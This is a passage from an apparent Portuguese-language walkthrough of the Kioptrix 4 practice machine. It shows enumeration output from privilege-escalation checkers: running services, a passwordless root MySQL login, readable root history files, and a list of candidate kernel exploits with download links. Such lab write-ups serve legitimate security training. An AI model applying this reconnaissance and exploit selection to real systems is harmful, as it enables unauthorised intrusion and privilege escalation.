inet addr:172.16.0.100 Bcast:172.16.0.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:899776 errors:136 dropped:244 overruns:0 frame:0
TX packets:611730 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:91501448 (87.2 MB) TX bytes:119399805 (113.8 MB)
Interrupt:17 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:8 errors:0 dropped:0 overruns:0 frame:0
TX packets:8 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:400 (400.0 B) TX bytes:400 (400.0 B)
[-] ARP history:
? (172.16.0.24) at 28:56:5A:FF:4D:3F [ether] on eth1
? (172.16.0.1) at 0C:80:63:16:68:8E [ether] on eth1
[-] Nameserver(s):
nameserver 8.8.8.8
nameserver 8.8.4.4
[-] Default route:
default 172.16.0.1 0.0.0.0 UG 0 0 0 eth1
[-] Listening TCP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
tcp 0 0 172.16.0.100:22 172.16.0.24:46824 ESTABLISHED -
[-] Listening UDP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 172.16.0.100:137 0.0.0.0:* -
udp 0 0 0.0.0.0:137 0.0.0.0:* -
udp 0 0 172.16.0.100:138 0.0.0.0:* -
udp 0 0 0.0.0.0:138 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
### SERVICES #############################################
[-] Running processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 2844 1692 ? Ss 12:25 0:01 /sbin/init
root 2 0.0 0.0 0 0 ? S< 12:25 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S< 12:25 0:00 [migration/0]
root 4 0.0 0.0 0 0 ? R< 12:25 0:00 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< 12:25 0:00 [watchdog/0]
root 6 0.0 0.0 0 0 ? S< 12:25 0:00 [events/0]
root 7 0.0 0.0 0 0 ? S< 12:25 0:00 [khelper]
root 41 0.0 0.0 0 0 ? S< 12:25 0:00 [kblockd/0]
root 44 0.0 0.0 0 0 ? S< 12:25 0:00 [kacpid]
root 45 0.0 0.0 0 0 ? S< 12:25 0:00 [kacpi_notify]
root 174 0.0 0.0 0 0 ? S< 12:25 0:00 [kseriod]
root 213 0.0 0.0 0 0 ? S 12:25 0:00 [pdflush]
root 214 0.0 0.0 0 0 ? S 12:25 0:00 [pdflush]
root 215 0.0 0.0 0 0 ? S< 12:25 0:00 [kswapd0]
root 257 0.0 0.0 0 0 ? S< 12:25 0:00 [aio/0]
root 1481 0.0 0.0 0 0 ? S< 12:25 0:00 [ata/0]
root 1484 0.0 0.0 0 0 ? S< 12:25 0:00 [ata_aux]
root 1493 0.0 0.0 0 0 ? S< 12:25 0:00 [scsi_eh_0]
root 1497 0.0 0.0 0 0 ? S< 12:25 0:00 [scsi_eh_1]
root 1510 0.0 0.0 0 0 ? S< 12:25 0:00 [ksuspend_usbd]
root 1515 0.0 0.0 0 0 ? S< 12:25 0:00 [khubd]
root 2363 0.0 0.0 0 0 ? S< 12:25 0:00 [scsi_eh_2]
root 2461 0.0 0.0 0 0 ? S< 12:25 0:00 [scsi_eh_3]
root 2462 0.0 0.0 0 0 ? S< 12:25 0:00 [scsi_eh_4]
root 2463 0.0 0.0 0 0 ? S< 12:25 0:00 [scsi_eh_5]
root 2464 0.0 0.0 0 0 ? S< 12:25 0:00 [scsi_eh_6]
root 2465 0.0 0.0 0 0 ? S< 12:25 0:00 [scsi_eh_7]
root 2466 0.0 0.0 0 0 ? S< 12:25 0:00 [scsi_eh_8]
root 2467 0.0 0.0 0 0 ? S< 12:25 0:00 [scsi_eh_9]
root 2468 0.0 0.0 0 0 ? S< 12:25 0:00 [scsi_eh_10]
root 2469 0.0 0.0 0 0 ? S< 12:25 0:00 [scsi_eh_11]
root 2470 0.0 0.0 0 0 ? S< 12:25 0:00 [scsi_eh_12]
root 2471 0.0 0.0 0 0 ? S< 12:25 0:00 [scsi_eh_13]
root 2472 0.0 0.0 0 0 ? S< 12:25 0:00 [scsi_eh_14]
root 2473 0.0 0.0 0 0 ? S< 12:25 0:00 [scsi_eh_15]
root 2474 0.0 0.0 0 0 ? S< 12:25 0:00 [scsi_eh_16]
root 2475 0.0 0.0 0 0 ? S< 12:25 0:00 [scsi_eh_17]
root 2476 0.0 0.0 0 0 ? S< 12:25 0:00 [scsi_eh_18]
root 2477 0.0 0.0 0 0 ? S< 12:25 0:00 [scsi_eh_19]
root 2478 0.0 0.0 0 0 ? S< 12:25 0:00 [scsi_eh_20]
root 2479 0.0 0.0 0 0 ? S< 12:25 0:00 [scsi_eh_21]
root 2480 0.0 0.0 0 0 ? S< 12:25 0:00 [scsi_eh_22]
root 2481 0.0 0.0 0 0 ? S< 12:25 0:00 [scsi_eh_23]
root 2482 0.0 0.0 0 0 ? S< 12:25 0:00 [scsi_eh_24]
root 2483 0.0 0.0 0 0 ? S< 12:25 0:00 [scsi_eh_25]
root 2484 0.0 0.0 0 0 ? S< 12:25 0:00 [scsi_eh_26]
root 2485 0.0 0.0 0 0 ? S< 12:25 0:00 [scsi_eh_27]
root 2486 0.0 0.0 0 0 ? S< 12:25 0:00 [scsi_eh_28]
root 2487 0.0 0.0 0 0 ? S< 12:25 0:00 [scsi_eh_29]
root 2488 0.0 0.0 0 0 ? S< 12:25 0:00 [scsi_eh_30]
root 2489 0.0 0.0 0 0 ? S< 12:25 0:00 [scsi_eh_31]
root 2490 0.0 0.0 0 0 ? S< 12:25 0:00 [scsi_eh_32]
root 2682 0.0 0.0 0 0 ? S< 12:25 0:00 [kjournald]
root 2853 0.0 0.0 2224 656 ? S<s 12:25 0:00 /sbin/udevd --dae
root 3155 0.0 0.0 0 0 ? S< 12:25 0:00 [kgameportd]
root 3304 0.0 0.0 0 0 ? S< 12:25 0:00 [kpsmoused]
root 4606 0.0 0.0 1716 492 tty4 Ss+ 12:25 0:00 /sbin/getty 38400
root 4608 0.0 0.0 1716 488 tty5 Ss+ 12:25 0:00 /sbin/getty 38400
root 4614 0.0 0.0 1716 484 tty2 Ss+ 12:25 0:00 /sbin/getty 38400
root 4618 0.0 0.0 1716 492 tty3 Ss+ 12:25 0:00 /sbin/getty 38400
root 4622 0.0 0.0 1716 492 tty6 Ss+ 12:25 0:00 /sbin/getty 38400
syslog 4655 0.0 0.0 1936 652 ? Ss 12:25 0:00 /sbin/syslogd -u
root 4674 0.0 0.0 1872 544 ? S 12:25 0:00 /bin/dd bs 1 if /
klog 4676 0.0 0.1 3164 2036 ? Ss 12:25 0:00 /sbin/klogd -P /v
root 4695 0.0 0.0 5316 984 ? Ss 12:25 0:00 /usr/sbin/sshd
root 4751 0.0 0.0 1772 528 ? S 12:25 0:00 /bin/sh /usr/bin/
root 4793 0.0 1.7 128640 17636 ? Sl 12:25 0:04 /usr/sbin/mysqld
root 4795 0.0 0.0 1700 560 ? S 12:25 0:00 logger -p daemon.
root 4868 0.0 0.1 6528 1328 ? Ss 12:25 0:00 /usr/sbin/nmbd -D
root 4870 0.0 0.2 10108 2544 ? Ss 12:25 0:00 /usr/sbin/smbd -D
root 4878 0.0 0.0 10108 1024 ? S 12:25 0:00 /usr/sbin/smbd -D
root 4885 0.0 0.1 8084 1340 ? Ss 12:25 0:00 /usr/sbin/winbind
root 4887 0.0 0.1 8084 1160 ? S 12:25 0:00 /usr/sbin/winbind
daemon 4906 0.0 0.0 1984 420 ? Ss 12:25 0:00 /usr/sbin/atd
root 4917 0.0 0.0 2104 884 ? Ss 12:25 0:00 /usr/sbin/cron
root 4939 0.0 0.5 20464 6200 ? Ss 12:25 0:00 /usr/sbin/apache2
dhcp 4999 0.0 0.0 2440 772 ? Ss 12:25 0:00 dhclient eth1
root 5006 0.0 0.0 1716 492 tty1 Ss+ 12:25 0:00 /sbin/getty 38400
www-data 5066 0.0 0.5 20596 5640 ? S 12:33 0:01 /usr/sbin/apache2
root 5150 0.0 0.0 8084 868 ? S 12:33 0:00 /usr/sbin/winbind
root 5151 0.0 0.1 8092 1260 ? S 12:33 0:00 /usr/sbin/winbind
www-data 5221 0.0 0.5 20612 5692 ? S 12:51 0:00 /usr/sbin/apache2
www-data 5222 0.0 0.5 20596 5628 ? S 12:51 0:00 /usr/sbin/apache2
www-data 5223 0.0 0.5 20596 5604 ? S 12:51 0:00 /usr/sbin/apache2
www-data 5225 0.0 0.5 20596 5648 ? S 12:51 0:00 /usr/sbin/apache2
www-data 5226 0.0 0.5 20596 5612 ? S 12:51 0:00 /usr/sbin/apache2
www-data 5233 0.0 0.5 20596 5612 ? S 12:53 0:00 /usr/sbin/apache2
www-data 5235 0.0 0.5 20612 5596 ? S 12:53 0:00 /usr/sbin/apache2
root 5530 0.0 0.3 11360 3720 ? Ss 13:29 0:00 sshd: john [priv]
john 5532 0.0 0.2 11868 2232 ? S 13:29 0:00 sshd: john@pts/0
john 5533 0.0 0.3 6016 3872 pts/0 Ss 13:29 0:00 python /bin/kshel
john 5540 0.0 0.0 0 0 pts/0 Z 13:29 0:00 [sh] <defunct>
john 5547 0.0 0.0 1772 484 pts/0 S 13:31 0:00 sh -c /bin/bash
john 5548 0.0 0.2 5440 2880 pts/0 S 13:31 0:00 /bin/bash
john 5627 0.0 0.2 5448 2904 pts/0 S 13:37 0:00 /bin/bash
john 6648 0.0 0.1 2712 1356 pts/0 S 14:04 0:00 vim
john 6653 0.0 0.0 1772 496 pts/0 S 14:05 0:00 /bin/sh
john 6663 0.0 0.1 4248 1692 pts/0 S+ 14:08 0:00 /bin/bash ./linen
john 6664 0.5 0.1 4780 1524 pts/0 R+ 14:08 0:00 /bin/bash ./linen
john 6666 0.0 0.0 1712 504 pts/0 S+ 14:08 0:00 tee -a
john 6876 0.0 0.1 4780 1344 pts/0 R+ 14:08 0:00 /bin/bash ./linen
john 6877 0.0 0.0 2644 1008 pts/0 R+ 14:08 0:00 ps aux
[-] Process binaries and associated permissions (from above list):
-rwxr-xr-x 1 root root 702160 May 12 2008 /bin/bash
-rwxr-xr-x 1 root root 48308 Apr 4 2008 /bin/dd
lrwxrwxrwx 1 root root 4 Feb 4 2012 /bin/sh -> dash
-rwxr-xr-x 1 root root 15168 Sep 26 2008 /sbin/getty
-rwxr-xr-x 1 root root 89604 Apr 11 2008 /sbin/init
-rwxr-xr-x 1 root root 23048 Nov 23 2007 /sbin/klogd
-rwxr-xr-x 1 root root 32080 Nov 23 2007 /sbin/syslogd
-rwxr-xr-x 1 root root 67608 Apr 14 2009 /sbin/udevd
-rwxr-xr-x 1 root root 348908 Jun 18 2009 /usr/sbin/apache2
-rwxr-xr-x 1 root root 16040 Feb 20 2007 /usr/sbin/atd
-rwxr-xr-x 1 root root 31904 May 12 2009 /usr/sbin/cron
-rwxr-xr-x 1 root root 7399552 Nov 14 2008 /usr/sbin/mysqld
-rwxr-xr-x 1 root root 1077056 Mar 9 2009 /usr/sbin/nmbd
-rwxr-xr-x 1 root root 3874172 Mar 9 2009 /usr/sbin/smbd
-rwxr-xr-x 1 root root 375684 May 14 2008 /usr/sbin/sshd
[-] /etc/init.d/ binary permissions:
total 300
drwxr-xr-x 2 root root 4096 Feb 4 2012 .
drwxr-xr-x 67 root root 4096 Nov 30 13:22 ..
-rw-r--r-- 1 root root 1335 Jan 23 2009 README
-rwxr-xr-x 1 root root 5736 Jun 18 2009 apache2
-rwxr-xr-x 1 root root 2653 May 6 2009 apparmor
-rwxr-xr-x 1 root root 969 Feb 20 2007 atd
-rwxr-xr-x 1 root root 3597 Jan 23 2009 bootclean
-rwxr-xr-x 1 root root 2121 Jan 23 2009 bootlogd
-rwxr-xr-x 1 root root 1768 Jan 23 2009 bootmisc.sh
-rwxr-xr-x 1 root root 3454 Jan 23 2009 checkfs.sh
-rwxr-xr-x 1 root root 10602 Jan 23 2009 checkroot.sh
-rwxr-xr-x 1 root root 6355 May 30 2007 console-screen.sh
-rwxr-xr-x 1 root root 1634 Nov 27 2008 console-setup
-rwxr-xr-x 1 root root 1761 May 12 2009 cron
-rwxr-xr-x 1 root root 1223 Jun 22 2007 dns-clean
-rwxr-xr-x 1 root root 7195 Sep 12 2008 glibc.sh
-rwxr-xr-x 1 root root 1228 Jan 23 2009 halt
-rwxr-xr-x 1 root root 909 Jan 23 2009 hostname.sh
-rwxr-xr-x 1 root root 4521 Sep 26 2008 hwclock.sh
-rwxr-xr-x 1 root root 4528 Sep 26 2008 hwclockfirst.sh
-rwxr-xr-x 1 root root 1376 Nov 27 2008 keyboard-setup
-rwxr-xr-x 1 root root 944 Jan 23 2009 killprocs
-rwxr-xr-x 1 root root 1729 Nov 23 2007 klogd
-rwxr-xr-x 1 root root 748 Jan 23 2006 loopback
-rwxr-xr-x 1 root root 1399 Oct 6 2008 module-init-tools
-rwxr-xr-x 1 root root 596 Jan 23 2009 mountall-bootclean.sh
-rwxr-xr-x 1 root root 2430 Jan 23 2009 mountall.sh
-rwxr-xr-x 1 root root 1465 Jan 23 2009 mountdevsubfs.sh
-rwxr-xr-x 1 root root 1544 Jan 23 2009 mountkernfs.sh
-rwxr-xr-x 1 root root 594 Jan 23 2009 mountnfs-bootclean.sh
-rwxr-xr-x 1 root root 1244 Jan 23 2009 mountoverflowtmp
-rwxr-xr-x 1 root root 3123 Jan 23 2009 mtab.sh
-rwxr-xr-x 1 root root 5755 Nov 14 2008 mysql
-rwxr-xr-x 1 root root 2515 Nov 14 2008 mysql-ndb
-rwxr-xr-x 1 root root 1905 Nov 14 2008 mysql-ndb-mgm
-rwxr-xr-x 1 root root 1772 Dec 3 2007 networking
-rwxr-xr-x 1 root root 2377 Oct 23 2007 pcmciautils
-rwxr-xr-x 1 root root 375 Oct 4 2007 pppd-dns
-rwxr-xr-x 1 root root 1261 Jul 10 2008 procps
-rwxr-xr-x 1 root root 7891 Jan 23 2009 rc
-rwxr-xr-x 1 root root 522 Jan 23 2009 rc.local
-rwxr-xr-x 1 root root 117 Jan 23 2009 rcS
-rwxr-xr-x 1 root root 692 Jan 23 2009 reboot
-rwxr-xr-x 1 root root 1000 Jan 23 2009 rmnologin
-rwxr-xr-x 1 root root 4945 Apr 10 2008 rsync
-rwxr-xr-x 1 root root 2663 Mar 9 2009 samba
-rwxr-xr-x 1 root root 1199 Jan 23 2009 sendsigs
-rwxr-xr-x 1 root root 585 Jan 23 2009 single
-rwxr-xr-x 1 root root 4215 Jan 23 2009 skeleton
-rwxr-xr-x 1 root root 3840 Feb 5 2012 ssh
-rwxr-xr-x 1 root root 510 Jan 23 2009 stop-bootlogd
-rwxr-xr-x 1 root root 647 Jan 23 2009 stop-bootlogd-single
-rwxr-xr-x 1 root root 3343 Nov 23 2007 sysklogd
-rwxr-xr-x 1 root root 2488 Apr 14 2009 udev
-rwxr-xr-x 1 root root 706 Apr 14 2009 udev-finish
-rwxr-xr-x 1 root root 7239 Jan 20 2009 ufw
-rwxr-xr-x 1 root root 4030 Jan 23 2009 umountfs
-rwxr-xr-x 1 root root 1833 Jan 23 2009 umountnfs.sh
-rwxr-xr-x 1 root root 1863 Jan 23 2009 umountroot
-rwxr-xr-x 1 root root 1815 Jan 23 2009 urandom
-rwxr-xr-x 1 root root 2445 Jan 23 2009 waitnfs.sh
-rwxr-xr-x 1 root root 1224 Mar 9 2009 winbind
-rwxr-xr-x 1 root root 1626 Mar 12 2008 wpa-ifupdown
### SOFTWARE #############################################
[-] Sudo version:
Sudo version 1.6.9p10
[-] MYSQL version:
mysql Ver 14.12 Distrib 5.0.51a, for debian-linux-gnu (i486) using readline 5.2
[+] We can connect to the local MYSQL service as 'root' and without a password!
mysqladmin Ver 8.41 Distrib 5.0.51a, for debian-linux-gnu on i486
Copyright (C) 2000-2006 MySQL AB
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL license
Server version 5.0.51a-3ubuntu5.4
Protocol version 10
Connection Localhost via UNIX socket
UNIX socket /var/run/mysqld/mysqld.sock
Uptime: 1 hour 42 min 49 sec
Threads: 1 Questions: 6140 Slow queries: 0 Opens: 26 Flush tables: 1 Open tables: 20 Queries per second avg: 0.995
[-] Apache version:
Server version: Apache/2.2.8 (Ubuntu)
Server built: Jun 18 2009 08:47:00
[-] Apache user configuration:
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/netcat
/usr/bin/wget
[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1145 Feb 4 2012 /etc/passwd
-rw-r--r-- 1 root root 827 Feb 4 2012 /etc/group
-rw-r--r-- 1 root root 497 Feb 4 2012 /etc/profile
-rw-r----- 1 root shadow 855 Feb 5 2012 /etc/shadow
[-] Can't search *.conf files as no keyword was entered
[-] Can't search *.php files as no keyword was entered
[-] Can't search *.log files as no keyword was entered
[-] Can't search *.ini files as no keyword was entered
[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 0 Feb 4 2012 /etc/inetd.conf
-rw-r--r-- 1 root root 2401 Feb 4 2012 /etc/sysctl.conf
-rw-r--r-- 1 root root 2975 Feb 4 2012 /etc/adduser.conf
-rw-r--r-- 1 root root 214 Mar 8 2008 /etc/updatedb.conf
-rw-r--r-- 1 root root 34 Feb 18 2008 /etc/e2fsck.conf
-rw-r----- 1 root fuse 216 Feb 26 2008 /etc/fuse.conf
-rw-r--r-- 1 root root 92 Oct 20 2007 /etc/host.conf
-rw-r--r-- 1 root root 599 Oct 9 2008 /etc/logrotate.conf
-rw-r--r-- 1 root root 34 Feb 4 2012 /etc/ld.so.conf
-rw-r--r-- 1 root root 417 Mar 27 2008 /etc/mke2fs.conf
-rw-r--r-- 1 root root 1260 Feb 21 2008 /etc/ucf.conf
-rw-r--r-- 1 root root 4793 Mar 28 2008 /etc/hdparm.conf
-rw-r--r-- 1 root root 2407 Feb 4 2012 /etc/lshell.conf
-rw-r--r-- 1 root root 13144 Nov 16 2007 /etc/ltrace.conf
-rw-r--r-- 1 root root 354 Mar 5 2007 /etc/fdmount.conf
-rw-r--r-- 1 root root 2689 Sep 12 2008 /etc/gai.conf
-rw-r--r-- 1 root root 342 Feb 4 2012 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 600 Oct 23 2007 /etc/deluser.conf
-rw-r--r-- 1 root root 57 Nov 30 13:22 /etc/resolv.conf
-rw-r--r-- 1 root root 2969 Mar 11 2008 /etc/debconf.conf
-rw-r--r-- 1 root root 475 Oct 20 2007 /etc/nsswitch.conf
-rw-r--r-- 1 root root 552 May 16 2008 /etc/pam.conf
-rw-r--r-- 1 root root 1614 Nov 23 2007 /etc/syslog.conf
-rw-r--r-- 1 root root 240 Feb 4 2012 /etc/kernel-img.conf
[-] Current user's history files:
-rw------- 1 john john 61 Feb 4 2012 /home/john/.bash_history
[+] Root's history files are accessible!
-rw------- 1 root root 59 Feb 6 2012 /root/.bash_history
-rw------- 1 root root 1 Feb 5 2012 /root/.mysql_history
-rw------- 1 root root 5 Feb 6 2012 /root/.nano_history
[-] Location and contents (if accessible) of .bash_history file(s):l ls
/home/john/.bash_history
exit
sudo su
clear
ls
cd /home/loneferret
ls
./nc
rm nc
exit
/home/loneferret/.bash_history
[-] Any interesting mail in /var/mail:
total 8
drwxrwsr-x 2 root mail 4096 Feb 4 2012 .
drwxr-xr-x 14 root root 4096 Feb 4 2012 ..
### SCAN COMPLETE ####################################
Como o alvo comprometido não suporta a ferramenta Linux Exploit Suggester, descobri que é possível rodar a ferramenta remota, executando com as informações do kernel do alvo, obtidas pelo comando uname.
$ ./linux-exploit-suggester.sh --uname "Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux"
Available information:
Kernel version: 2.6.24
Architecture: i686
Distribution: N/A
Distribution version: N/A
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): N/A
Package listing: N/A
Searching among:
72 kernel space exploits
0 user space exploits
Possible Exploits:
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: probable
Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847.cpp
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2017-6074] dccp
Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
Exposure: less probable
Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
Download URL: https://www.exploit-db.com/download/41458
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
[+] [CVE-2013-0268] msr
Details: https://www.exploit-db.com/exploits/27297/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/27297
[+] [CVE-2012-0056,CVE-2010-3849,CVE-2010-3850] full-nelson
Details: http://vulnfactory.org/exploits/full-nelson.c
Exposure: less probable
Tags: ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)},ubuntu=10.04{kernel:2.6.32-(21|24)-server}
Download URL: http://vulnfactory.org/exploits/full-nelson.c
[+] [CVE-2010-4347] american-sign-language
Details: https://www.exploit-db.com/exploits/15774/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/15774
[+] [CVE-2010-3848,CVE-2010-3850,CVE-2010-4073] half_nelson
Details: https://www.exploit-db.com/exploits/17787/
Exposure: less probable
Tags: ubuntu=(10.04|9.10){kernel:2.6.(31|32)-(14|21)-server}
Download URL: https://www.exploit-db.com/download/17787
[+] [CVE-2010-3437] pktcdvd
Details: https://www.exploit-db.com/exploits/15150/
Exposure: less probable
Tags: ubuntu=10.04
Download URL: https://www.exploit-db.com/download/15150
[+] [CVE-2010-3081] video4linux
Details: https://www.exploit-db.com/exploits/15024/
Exposure: less probable
Tags: RHEL=5
Download URL: https://www.exploit-db.com/download/15024
[+] [CVE-2010-2959] can_bcm
Details: https://www.exploit-db.com/exploits/14814/
Exposure: less probable
Tags: ubuntu=10.04{kernel:2.6.32-24-generic}
Download URL: https://www.exploit-db.com/download/14814
[+] [CVE-2010-1146] reiserfs
Details: https://www.exploit-db.com/exploits/12130/
Exposure: less probable
Tags: ubuntu=9.10
Download URL: https://www.exploit-db.com/download/12130
[+] [CVE-2009-3547] pipe.c 3
Details: https://www.exploit-db.com/exploits/10018/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/10018
[+] [CVE-2009-3547] pipe.c 2
Details: https://www.exploit-db.com/exploits/33322/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/33322
[+] [CVE-2009-3547] pipe.c 1
Details: https://www.exploit-db.com/exploits/33321/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/33321
[+] [CVE-2009-2692] sock_sendpage (simple version)
Details: https://www.exploit-db.com/exploits/9479/
Exposure: less probable
Tags: ubuntu=7.10,RHEL=4,fedora=4|5|6|7|8|9|10|11
Download URL: https://www.exploit-db.com/download/9479
Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0
[+] [CVE-2009-2692,CVE-2009-1895] sock_sendpage (ppc)
Details: https://www.exploit-db.com/exploits/9545/
Exposure: less probable
Tags: ubuntu=8.10,RHEL=4|5
Download URL: https://www.exploit-db.com/download/9545
Comments: /proc/sys/vm/mmap_min_addr needs to equal 0
[+] [CVE-2009-2692,CVE-2009-1895] sock_sendpage
Details: https://xorl.wordpress.com/2009/07/16/cve-2009-1895-linux-kernel-per_clear_on_setid-personality-bypass/
Exposure: less probable
Tags: ubuntu=9.04
Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9435.tgz
Comments: /proc/sys/vm/mmap_min_addr needs to equal 0 OR pulseaudio needs to be installed
[+] [CVE-2009-2692,CVE-2009-1895] sock_sendpage3
Details: https://www.exploit-db.com/exploits/9641/
Exposure: less probable
Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9641.tar.gz
Comments: /proc/sys/vm/mmap_min_addr needs to equal 0 OR pulseaudio needs to be installed
[+] [CVE-2009-2692,CVE-2009-1895] sock_sendpage2
Details: https://www.exploit-db.com/exploits/9436/
Exposure: less probable
Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9436.tgz
Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0
[+] [CVE-2008-0600] vmsplice2
Details: https://www.exploit-db.com/exploits/5093/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/5093
[+] [CVE-2008-0600] vmsplice1
Details: https://www.exploit-db.com/exploits/5092/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/5092
Muitos exploits foram localizados, algo perto de 72 exploits, possivelmente muitos falsos positivos na lista.
Outra ferramenta empregada para auxiliar na escalação de privilégios foi a LinuxPrivChecker.py
$ ./linuxprivchecker.py
=================================================================================================
LINUX PRIVILEGE ESCALATION CHECKER
=================================================================================================
[*] GETTING BASIC SYSTEM INFO...
[+] Kernel
Linux version 2.6.24-24-server (buildd@palmer) (gcc version 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) #1 SMP Tue Jul 7 20:21:17 UTC 2009
[+] Hostname
Kioptrix4
[+] Operating System
Welcome to LigGoat Security Server
[*] GETTING NETWORKING INFO...
[+] Interfaces
eth1 Link encap:Ethernet HWaddr 00:0c:29:ee:a1:97
inet addr:172.16.0.100 Bcast:172.16.0.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:feee:a197/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:907204 errors:136 dropped:0 overruns:0 frame:0
TX packets:618381 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:92158617 (87.8 MB) TX bytes:120824256 (115.2 MB)
Interrupt:17 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:8 errors:0 dropped:0 overruns:0 frame:0
TX packets:8 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:400 (400.0 B) TX bytes:400 (400.0 B)
[+] Netstat
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
tcp 0 0 172.16.0.100:22 172.16.0.24:46824 ESTABLISHED -
udp 0 0 172.16.0.100:137 0.0.0.0:* -
udp 0 0 0.0.0.0:137 0.0.0.0:* -
udp 0 0 172.16.0.100:138 0.0.0.0:* -
udp 0 0 0.0.0.0:138 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
[+] Route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
172.16.0.0 * 255.255.255.0 U 0 0 0 eth1
default 172.16.0.1 0.0.0.0 UG 0 0 0 eth1
[*] GETTING FILESYSTEM INFO...
[+] Mount results
/dev/sda1 on / type ext3 (rw,relatime,errors=remount-ro)
proc on /proc type proc (rw,noexec,nosuid,nodev)
/sys on /sys type sysfs (rw,noexec,nosuid,nodev)
varrun on /var/run type tmpfs (rw,noexec,nosuid,nodev,mode=0755)
varlock on /var/lock type tmpfs (rw,noexec,nosuid,nodev,mode=1777)
udev on /dev type tmpfs (rw,mode=0755)
devshm on /dev/shm type tmpfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
[+] fstab entries
# /etc/fstab: static file system information.
#
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
# /dev/sda1
UUID=40a5b382-9839-460b-89cd-99323c331651 / ext3 relatime,errors=remount-ro 0 1
# /dev/sda5
UUID=e1b49fcb-122e-4463-97db-fbff15e6ffde none swap sw 0 0
/dev/scd0 /media/cdrom0 udf,iso9660 user,noauto,exec,utf8 0 0
/dev/fd0 /media/floppy0 auto rw,user,noauto,exec,utf8 0 0
[+] Scheduled cron jobs
-rw-r--r-- 1 root root 724 May 12 2009 /etc/crontab
/etc/cron.d:
total 16
drwxr-xr-x 2 root root 4096 Feb 4 2012 .
